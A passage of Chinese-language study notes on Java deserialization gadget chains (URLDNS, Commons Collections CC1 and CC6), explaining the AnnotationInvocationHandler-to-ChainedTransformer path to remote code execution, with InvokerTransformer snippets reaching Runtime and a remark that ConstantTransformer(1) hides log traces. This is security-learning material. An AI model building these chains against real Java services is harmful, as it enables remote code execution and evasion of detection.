12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-family:Cambria;">p神的介绍因为是入门比较简单，比较好玩的是su18改版的urldns，用来判断是否存在gadget需要的类</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><a href="https://mp.weixin.qq.com/s?__biz=Mzg3NjA4MTQ1NQ==&mid=2247484178&idx=1&sn=228ccc3d624f2d64a6c1d51555c42eea&scene=21#wechat_redirect" data-linktype="2"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;">https://mp.weixin.qq.com/s/KncxkSIZ7HVXZ0iNAX8xPA</span></span></span></a></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://su18.org/post/gadgetor/" target="_blank">https://su18.org/post/gadgetor/</a></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:urldns;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://github.com/kezibei/Urldns" target="_blank">https://github.com/kezibei/Urldns</a></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style="font-family:Calibri;">CC1</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:宋体;">总体介绍和问题解析</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">CC链整体可以看这个</span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://xz.aliyun.com/t/10357" target="_blank">https://xz.aliyun.com/t/10357</a></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.cnblogs.com/litlife/p/12571787.html#transformer" target="_blank">https://www.cnblogs.com/litlife/p/12571787.html#transformer</a></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;font-weight:bold;">总的来说就是AnnotationInvocationHandler反序列化过程中通过memberValues.entrySet()调用了，这里的memberValues是proxymap，mapProxy.entrySet()，任意proxy的方法调用都会调用proxy代理的invoke方法，这里的proxy设置为AnnotationInvocationHandler，所以调用AnnotationInvocationHandler的invoke方法，他的memberValues是lazymap，调用lazymap的get方法，如果key不存在就调用transfer方法，开启调用ChainedTransformer数组利用链</span></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">ObjectInputStream.readObject() -> AnnotationInvocationHandler.readObject() -> this.memberValues.entrySet() = mapProxy.entrySet() -> AnnotationInvocationHandler.invoke() -> this.memberValues.get(xx) = LazyMap.get(not_exist_key) -> ChainedTransformer.transform() -> InvokerTransfomer.transform() -> RCE</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">cc1不能用的原因</span></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">Map<string, object="object">streamVals = (Map<string, object="object">)fields.get("memberValues", null);</string,></string,></span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                

                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">强制类型转化吧我们的memberValues转换为Map<string, object="object">，但实际调试可以发现此时的memberValues是proxy代理对象，所以会出错导致streamVals为null，我们设置的proxy没能成功传入反序列化过程，到了下面取null的entrySet自然取不到值</string,></span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;"></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                </span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;"></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;font-weight:bold;">p牛是用transformedMap复现的，所以他说的高版本不能用的原因是他理解的transformedmap的原因，不是工具中使用lazymap在高版本不能用的原因</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;"></span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">ysoserial在构造Transformers时，为什么要用那么多反射?</span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">因为Runtime类没有继承Serializable接口，所以不能被序列化，在序列化时会出错，使用反射可以解决这个问题</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:宋体;">反射代码解析</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">在实例化这个InvokerTransformer时，需要传⼊三个参数，第⼀个参数是待执⾏的⽅法名，第⼆个参数                是这个函数的参数列表的参数类型，第三个参数是传给这个函数的参数列表。</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.cnblogs.com/zpchcbd/p/14726562.html" target="_blank">https://www.cnblogs.com/zpchcbd/p/14726562.html</a></span></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">p神的文章中设置如下参数</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                

                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">第二个参数是因为 getMethod 方法的第二个参数类型是 Class[]，如果不需要传递任何参数，可以使用一个空的类对象数组。</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                

                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">其实不传输一个空参也可以，默认置空</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="">new InvokerTransformer("getMethod",new Class[]{String.class},new Object[]{"getRuntime"}),</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">ConstantTransformer是实现了Transformer接⼝的⼀个类，它的过程就是在构造函数的时候传⼊⼀个                对象，并在transform⽅法将这个对象再返回</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">TransformedMap⽤于对Java标准数据结构Map做⼀个修饰，被修饰过的Map在添加新的元素时，将可                以执⾏⼀个回调。我们通过下⾯这⾏代码对innerMap进⾏修饰，传出的outerMap即是修饰后的Map.其中，keyTransformer是处理新元素的Key的回调，valueTransformer是处理新元素的value的回调。                我们这⾥所说的”回调“，并不是传统意义上的⼀个回调函数，⽽是⼀个实现了Transformer接⼝的类。</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">Transformer是⼀个接⼝，它只有⼀个待实现的⽅法,TransformedMap在转换Map的新元素时，就会调⽤transform⽅法，这个过程就类似在调⽤⼀个”回调                函数“，这个回调的参数是原始对象。</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">ChainedTransformer也是实现了Transformer接⼝的⼀个类，它的作⽤是将内部的多个Transformer串                在⼀起。通俗来说就是，前⼀个回调返回的结果，作为后⼀个回调的参数传⼊。按顺序调用 Transformer 数组 this.iTransformers 中所有 Transformer 对象的 transform 方法，并且每次调用的结果传递给下一个 Transformer#transform() 作为参数</span></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">public</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Constructor</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">T</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">       </span></span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredConstructor</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> parameterType</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">                </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">       </span></span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">throws</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">NoSuchMethodException</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">SecurityException</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">怎么触发回调呢？就是向Map中放⼊⼀个新的元素</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;"></span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:宋体;">动态代理</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://www.cnblogs.com/yy3b2007com/p/9065303.html" target="_blank">https://www.cnblogs.com/yy3b2007com/p/9065303.html</a></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="http://1.15.187.227/index.php/archives/457/" target="_blank">http://1.15.187.227/index.php/archives/457/</a></span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">InvocationHandler接口是proxy代理实例的调用处理程序实现的一个接口，每一个proxy代理实例都有一个关联的调用处理程序；在代理实例调用方法时，方法调用被编码分派到调用处理程序的invoke方法</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">AnnotationInvocationHandler 判断第一个参数必须是注释类</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">JAVA中间件在对序列化的AnnotationInvocationHandler类的对象数据进行反序列化时，会调用其readObject方法并触发漏洞</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">因为 sun.reflect.annotation.AnnotationInvocationHandler 是在JDK内部的类，不能直接使用new来实例化。使用反射获取到了它的构造方法，并将其设置成外部可见的，再调用就可以实例化了</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">sun.reflect.annotation.AnnotationInvocationHandler 构造函数的第一个参数必须是                Annotation的子类，且其中必须含有至少一个方法，假设方法名是X</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style=""><span style="font-family:Cambria;">被 TransformedMap.decorate 修饰的Map中必须有一个键名为X的元素。所以，这也解释了为什么我前面用到 Retention.class ，因为Retention有一个方法，名为value；所以，为了再满足第二个条件，我需要给Map中放入一个Key是value的元素</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style="mso-bookmark:lazymap;"><span style="font-family:Calibri;">lazymap</span></span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style="mso-bookmark:lazymap;"><span style="font-family:Cambria;">lazymap是懒加载，在get找不到值的时候，它会调用factory.transform 方法去获取一个值。</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style="mso-bookmark:constanttransformer1;"><span style="font-family:Calibri;">ConstantTransformer(1)</span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style="mso-bookmark:constanttransformer1;"><span style="font-family:Cambria;">最后会增加一个ConstantTransformer(1)，隐蔽了启动进程的日志特征：</span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc1;"><span style="mso-bookmark:constanttransformer1;"><span style="font-family:Cambria;"></span></span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-1;"><span style="font-family:Calibri;">CC6</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Calibri;">CC6</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">GPT侠时间</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="">`org.apache.commons.collections.keyvalue.TiedMapEntry` 是 Apache Commons Collections 库中的一个类，它实现了 `java.util.Map.Entry` 接口。它的作用是将一个已存在的键值对（键和值）绑定到指定的 `Map` 实例。</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="">具体来说，`TiedMapEntry` 类提供了以下功能：</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="">1. 将键值对绑定到 `Map` 实例：通过构造函数，你可以将一个已存在的键值对绑定到 `TiedMapEntry` 对象，并指定要绑定的 `Map` 实例。这样，`TiedMapEntry` 对象就代表了该键值对在指定的 `Map` 中的绑定关系。</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="">2. 实现 `Map.Entry` 接口：`TiedMapEntry` 类实现了 `Map.Entry` 接口，它提供了访问和操作键值对的方法。你可以使用 `TiedMapEntry` 对象来获取键和值，并对其进行读取或修改。</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="">3. 与绑定的 `Map` 实例保持同步：`TiedMapEntry` 对象与绑定的 `Map` 实例保持同步，这意味着对 `TiedMapEntry` 对象的操作实际上会直接影响到绑定的 `Map` 实例中对应的键值对。反之亦然，对绑定的 `Map` 实例中对应的键值对的修改也会反映在 `TiedMapEntry` 对象上。</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="">通过使用 `TiedMapEntry`，你可以方便地将现有的键值对绑定到指定的 `Map` 实例，并使用 `TiedMapEntry` 对象对键值对进行访问和操作。这对于在某些场景下需要绑定和同步键值对的应用程序非常有用。</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">直接看cc6不如先看cc5，cc6的链子很简单，问题在于要remove我们的键值，p神给的解释是</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">问题出在第一遍调用put时候触发反序列化链时候lazymap#get方法没有找到key去触发transform后把键值put到map中，在反序列化过程中再次触发get方法直接再map中找到键值了，就不会触发后续的transform方法了</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">工具中的cc6通过反射方式将entry赋值给HashSet实例中的一个Node的key属性</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">TiedMapEntry entry </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span 